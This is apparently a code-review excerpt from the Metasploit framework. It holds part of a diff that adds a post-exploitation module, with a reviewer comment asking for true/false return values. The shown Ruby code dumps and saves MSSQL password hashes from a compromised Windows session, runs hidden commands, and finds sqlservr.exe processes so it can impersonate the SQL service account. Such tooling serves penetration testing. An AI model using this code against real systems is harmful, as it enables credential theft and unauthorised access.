modules/post/windows/manage/mssql_local_hashdump.rb

```diff
@@ -0,0 +1,430 @@
+
+      # Create the Metasploit::Credential::Core object
+      credential_core = create_credential(credential_data)
+
+      # Assemble the options hash for creating the Metasploit::Credential::Login object
+      login_data = {
+        core: credential_core,
+        status: Metasploit::Model::Login::Status::UNTRIED
+      }
+
+      # Merge in the service data and create our Login
+      login_data.merge!(service_data)
+      login = create_credential_login(login_data)
+
+      print_good("#{rhost} Saving = #{user}:#{hash}")
+
+      loot_hashes << user+":"+hash+"\n"
+ 
+    end
+    if loot_hashes != "" 
+        # Store MSSQL password hash as loot
+        loot_path = store_loot('mssql.hash', 'text/plain', session, loot_hashes, 'mssql_hashdump.txt', 'MSSQL Password Hash')
+        print_good("MSSQL password hash saved in: #{loot_path}")
+        return 1
+    else
+        return 0
+    end
+  end
+
+  ## ----------------------------------------------
+  ## Method for executing cmd and returning the response
+  ## Note: This is from one of Jabra's modules - Thanks man!
+  ##----------------------------------------------
+  def run_cmd(cmd,token=true)
+    opts = {'Hidden' => true, 'Channelized' => true, 'UseThreadToken' => token}
+    process = session.sys.process.execute(cmd, nil, opts)
+    res = ""
+    while (d = process.channel.read)
+      break if d == ""
+      res << d
+    end
+    process.channel.close
+    process.close
+    return res
+  end
+
+
+  ## ----------------------------------------------
+  ## Method for impersonating sql server instance
+  ## Taken from mssql_local_auth_bypass
+  ## Thanks Scott Sutherland !
+  ## ----------------------------------------------
+  def impersonate_sql_user(service_instance,verbose)
+
+    # Print the current user
+    blah = session.sys.config.getuid if verbose == "true"
+    print_status("Current user: #{blah}") if verbose == "true"
+
+    # Define target user/pid
+    targetuser = ""
+    targetpid = ""
+
+    # Identify SQL Server service processes
+    print_status("Searching for sqlservr.exe processes not running as SYSTEM...")
+    session.sys.process.get_processes().each do |x|
+
+      # Search for all sqlservr.exe processes
+      if ( x['name'] == "sqlservr.exe" and x['user'] != "NT AUTHORITY\\SYSTEM")
+
+        # Found one
+        print_good("Found \"#{x['user']}\" running sqlservr.exe process #{x['pid']}")
+
+        # Define target pid / user
+        if x['user'] =~ /NT SERVICE/ then
+          if x['user'] == "NT SERVICE\\MSSQL$#{service_instance}" then
+            targetuser = "NT SERVICE\\MSSQL$#{service_instance}"
+            targetpid = x['pid']
+          end
+        else
+          targetuser = x['user']
+          targetpid = x['pid']
+        end
+      end
+    end
+
+    # Attempt to migrate to target sqlservr.exe process
+    if targetuser == "" then
+      print_error("Unable to find sqlservr.exe process not running as SYSTEM")
+      return 0
```

Comment:
Can you please use `false` and `true` instead of `0` and `1`? Then all checks can just be `if foo` rather than `if foo == 1`